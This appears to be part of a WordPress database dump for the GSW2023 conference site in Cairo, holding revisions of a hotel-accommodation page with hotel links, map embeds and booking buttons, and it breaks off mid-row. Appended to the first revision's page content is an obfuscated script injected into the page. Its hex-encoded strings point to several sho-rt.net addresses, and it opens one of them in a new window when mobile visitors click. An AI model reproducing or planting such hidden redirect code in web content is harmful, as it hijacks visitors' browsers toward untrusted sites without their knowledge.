src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<h5 style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\"><span style=\"font-size: 14pt; color: #ffff00;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:13:28','2023-07-18 23:13:28','',2685,'https://gsw2023.com/?p=5026',0,'revision','',0),
(5027,1,'2023-07-18 23:13:55','2023-07-18 23:13:55','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<h5 style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\"><span style=\"font-size: 14pt; color: #ffff00;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator 